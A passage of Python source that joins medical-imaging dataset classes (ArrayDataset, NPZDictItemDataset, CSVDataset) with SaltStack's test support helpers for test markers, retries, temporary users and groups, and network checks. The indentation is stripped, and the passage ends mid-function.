def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
Support to only load specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be a int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
# pylint: disable=repr-flag-used-in-string,wrong-import-order
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from pytestsalt.utils import get_unused_localhost_port
from salt.ext import six
from salt.ext.six.moves import builtins, range
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__destructive_test__", True)
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
self.skipTest("Destructive tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
cls.skipTest("Destructive tests are disabled")
return caller(cls)
return wrap
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__expensive_test__", True)
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
self.skipTest("Expensive tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
cls.skipTest("Expensive tests are disabled")
return caller(cls)
return wrap
def flaky(caller=None, condition=True, attempts=4):
"""
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
# test runner will have already ran setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
six.reraise(*exc_info)
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
six.reraise(*exc_info)
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
"""
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
self.skipTest("SSH tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
cls.skipTest("SSH tests are disabled")
return caller(cls)
return wrap
class RedirectStdStreams(object):
"""
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
"""
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
class TstSuiteLoggingHandler(object):
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn(object):
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if six.PY2:
if globals_ is None:
globals_ = {}
if locals_ is None:
locals_ = {}
if level is None:
if six.PY2:
level = -1
else:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {0!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {0!r}".format(
"from {0} import {1}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls)
return wrapper
return decorator
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
class WithTempfile(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
Skip the test if grains don't match the values passed into **kwargs
if a kwarg value is a list then skip if the grains don't match any item in the list
"""
def decorator(caller):
@functools.wraps(caller)
def wrapper(cls):
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if not any(
str(grains.get(kw)).lower() != str(v).lower() for v in value
):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
raise SkipTest(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
raise SkipTest(reason)
return caller(cls)
return wrapper
return decorator
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
Skip the test if any grains match the values passed into **kwargs
if a kwarg value is a list then skip if the grains match any item in the list
"""
def decorator(caller):
@functools.wraps(caller)
def wrapper(cls):
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(
str(grains.get(kw)).lower() == str(v).lower() for v in value
):
if reason is None:
